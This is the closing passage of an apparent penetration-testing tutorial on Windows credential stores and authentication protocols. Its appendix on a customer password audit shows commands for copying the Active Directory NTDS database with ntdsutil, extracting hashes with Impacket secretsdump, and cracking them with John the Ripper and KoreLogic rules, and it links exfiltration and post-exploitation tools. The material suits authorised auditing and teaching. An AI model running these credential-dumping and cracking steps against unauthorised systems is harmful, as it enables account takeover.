<td><p class="first">The Active Directory database is the authoritative store of credentials for all user and computer accounts in an
Active Directory domain. Each writable domain controller in the domain contains a full copy of the domain’s Active
Directory database, including account credentials for all accounts in the domain. Read-only domain controllers (RODCs)
house a partial local replica with credentials for a selected subset of the accounts in the domain. By default, RODCs
do not have a copy of privileged domain accounts.</p>
<p class="last">The Active Directory database stores a number of attributes for each account, including both username types and the
following:
- NT hash for current password.
- NT hashes for password history (if configured).</p>
</td>
</tr>
<tr class="row-even"><td>Credential Manager
(CredMan) store</td>
<td>Users may choose to save passwords in Windows using an application or through the Credential Manager Control Panel
applet. These credentials are stored on disk and protected using the Data Protection Application Programming Interface
(DPAPI), which encrypts them with a key derived from the user’s password. Any program running as that user will be
able to access credentials in this store.</td>
</tr>
</tbody>
</table>
<p>Before we dig down in gathering credentials from a compromised machine, we should understand about Windows authentication protocols</p>
</div>
<div class="section" id="windows-authentication-protocols">
<h4>Windows authentication protocols<a class="headerlink" href="#windows-authentication-protocols" title="Permalink to this headline">¶</a></h4>
<p>The following table provides information on Windows authentication protocols and a brief description of each supported protocol.</p>
<table border="1" class="docutils">
<colgroup>
<col width="8%" />
<col width="92%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Protocol</th>
<th class="head">Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td>Kerboros</td>
<td>Kerberos is the default and preferred authentication protocol for domain authentication on current Windows operating
systems. Kerberos relies on a system of keys, tickets, and mutual authentication in which keys are normally not passed
across the network. (Direct use of the key is permitted for some application clients under certain circumstances).
Certain Kerberos-specific objects that are used in the authentication process are stored as LSA secrets in memory,
such as Ticket Granting Tickets (TGT) and Service Tickets (ST). TGTs are Single sign-on (SSO) authentication credentials
that can be reused for lateral movement or privilege escalation, while STs are not credentials that can be used for lateral
movement or privilege escalation.</td>
</tr>
<tr class="row-odd"><td>NTLM</td>
<td>NTLM protocols are authentication protocols that use a challenge and response method to make clients mathematically prove
that they have possession of the NT hash. Current and past versions of Windows support multiple versions of this protocol,
including NTLMv2, NTLM, and the LM authentication protocol.</td>
</tr>
<tr class="row-even"><td>Digest</td>
<td>Digest is a standards-based protocol typically used for HTTP and Lightweight Directory Access Protocol (LDAP) authentication
Digest authentication is described in RFCs 2617 and 2831.</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="section" id="appendix-ii-cracking-hashes">
<span id="a2-cracking-hashes"></span><h2>Appendix-II Cracking Hashes<a class="headerlink" href="#appendix-ii-cracking-hashes" title="Permalink to this headline">¶</a></h2>
<p>Recently, we were given a requirement by a customer to figure out if any user in their Active Directory are using simple passwords!</p>
<p>For this, they provided us with the Active Directory database which can taken from a domain controller by using the below command on a administrative shell.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>ntdsutil &quot;ac in ntds&quot; &quot;ifm&quot; &quot;cr fu c:\temp&quot; q q
</pre></div>
</div>
<p>Once, this database is obtained, it can be converted to the required format</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>domain\username:RID:lmhash:nthash:::
</pre></div>
</div>
<p>by running <a class="reference external" href="https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py">Impacket Secretsdump</a></p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile customer
</pre></div>
</div>
<p>The command above will create a file called “customer.ntds” which we can use for password cracking.</p>
<p>Now, we can try john or hashcat to do the password cracking.</p>
<div class="section" id="john-the-ripper">
<h3>John The Ripper<a class="headerlink" href="#john-the-ripper" title="Permalink to this headline">¶</a></h3>
<div class="section" id="lm-nt-nt-hashes">
<h4>LM:NT/ NT-Hashes<a class="headerlink" href="#lm-nt-nt-hashes" title="Permalink to this headline">¶</a></h4>
<p>The above database would have your LM:NT hashes and can be cracked using</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>john --wordlist=&lt;Word_Dictionary.txt&gt; --format=LM customer.ntds
</pre></div>
</div>
<p>However, for some strange reason, only 140 hashes were getting loaded in John instead of approx 50K hashes. So, we converted LM:NT hashes to NT hashes.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>domain\username:RID:lmhash:nthash:::
</pre></div>
</div>
<p>to</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>domain\username:nthash
</pre></div>
</div>
<p>and loaded it in John</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>john --wordlist=&lt;Word_Dictionary.txt&gt; --format=NT customer.nt
</pre></div>
</div>
<p>Instead of our custom dictionary customer provided, we also tried the rockyou.txt and darkc0de.lst dictionaries. However, the customer also wanted to try variations of Passwords such as <a class="reference external" href="mailto:Password&#37;&#52;&#48;123">Password<span>&#64;</span>123</a>, inplace of &#64;, maybe !,#,$,%,^,&amp;,* etc. This thing can be solved with John Rules</p>
</div>
<div class="section" id="korelogic-rules">
<h4>Korelogic Rules<a class="headerlink" href="#korelogic-rules" title="Permalink to this headline">¶</a></h4>
<p><a class="reference external" href="http://contest-2010.korelogic.com/rules.html">KoreLogic</a> used a variety of custom rules to generate the passwords. These _same_ rules can be used to crack passwords in corporate environments. These rules were originally created because the default ruleset for John the Ripper fails to crack passwords with more complex patterns used in corporate environments.</p>
<p>Download <a class="reference external" href="http://contest-2010.korelogic.com/rules.html">KoreLogic’s Custom rules</a></p>
<p>To use KoreLogic’s rules in John the Ripper: download the rules.txt file - and perform the following command in the directory where your john.conf is located.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>cat rules.txt &gt;&gt; john.conf
</pre></div>
</div>
<p>Example command lines are as follows:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># ./john -w:Lastnames.dic --format:nt --rules:KoreLogicRulesAdd2010Everywhere pwdump.txt
# ./john -w:3EVERYTHING.doc --format:ssha --rules:KoreLogicRulesMonthsFullPreface fgdump.txt
# ./john -w:Seasons.dic --format:md5 --rules:KoreLogicRulesPrependJustSpecials /etc/shadow
</pre></div>
</div>
<p>or everything as once</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do echo ./john --rules=${ruleset} --wordlist=sports_teams.dic --format=nt pwdump.txt; done
</pre></div>
</div>
</div>
<div class="section" id="loopback">
<h4>Loopback?<a class="headerlink" href="#loopback" title="Permalink to this headline">¶</a></h4>
<p>John has loopback thing, also where it uses passwords which has been already cracked to crack more passwords.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>--loopback[=FILE]         like --wordlist, but fetch words from a .pot file
</pre></div>
</div>
<p>For more information Refer <a class="reference external" href="https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf">John the Ripper CheatSheet</a></p>
</div>
<div class="section" id="password-statistics">
<h4>Password Statistics<a class="headerlink" href="#password-statistics" title="Permalink to this headline">¶</a></h4>
<p>BlackHills has released <a class="reference external" href="https://github.com/clr2of8/DPAT">Domain Password Audit Tool</a> that will generate password use statistics from password hashes dumped from a domain controller and a password crack file such as hashcat.potfile generated from the Hashcat tool during password cracking.</p>
</div>
</div>
</div>
<div class="section" id="appendix-iii-interesting-stories">
<span id="a3-interesting-stories"></span><h2>Appendix-III Interesting Stories<a class="headerlink" href="#appendix-iii-interesting-stories" title="Permalink to this headline">¶</a></h2>
<ul class="simple">
<li><a class="reference external" href="http://securitypadawan.blogspot.in/2016/01/enumerating-excluded-antivirus-locations.html">Enumerating Excluded AntiVirus Locations</a></li>
<li>Launching Empire from Meterpreter/ Beacon and passing meterpreter to Metasploit/ Cobalt Strike : Refer Sixdub blog on <a class="reference external" href="http://www.sixdub.net/?p=627">Empire &amp; Tool Diversity: Integration is Key</a></li>
</ul>
<div class="section" id="tools">
<h3>Tools<a class="headerlink" href="#tools" title="Permalink to this headline">¶</a></h3>
<ul class="simple">
<li><a class="reference external" href="https://github.com/giMini/PowerMemory">PowerMemory</a></li>
<li><a class="reference external" href="https://github.com/sensepost/DET">Data Exfiltration Toolkit (DET)</a></li>
</ul>
</div>
</div>
<div class="section" id="changelog">
<h2>Changelog<a class="headerlink" href="#changelog" title="Permalink to this headline">¶</a></h2>
<ul class="simple">
</ul>
<div data-disqus-identifier="Infrastructure PenTest Series : Part 4 - Post Exploitation" data-disqus-shortname="techbitvijays" id="disqus_thread"></div></div>
</div>


          </div>
        </div>
      </div>
      <div class="clearer"></div>
    </div>
    <div class="related" role="navigation" aria-label="related navigation">
      <h3>Navigation</h3>
      <ul>
        <li class="nav-item nav-item-0"><a href="index.html">tech.bitvijays.com</a> &#187;</li> 
      </ul>
    </div>
    <div class="footer" role="contentinfo">
        &#169; Copyright 2017, Vijay Kumar.
    </div>
  </body>
</html>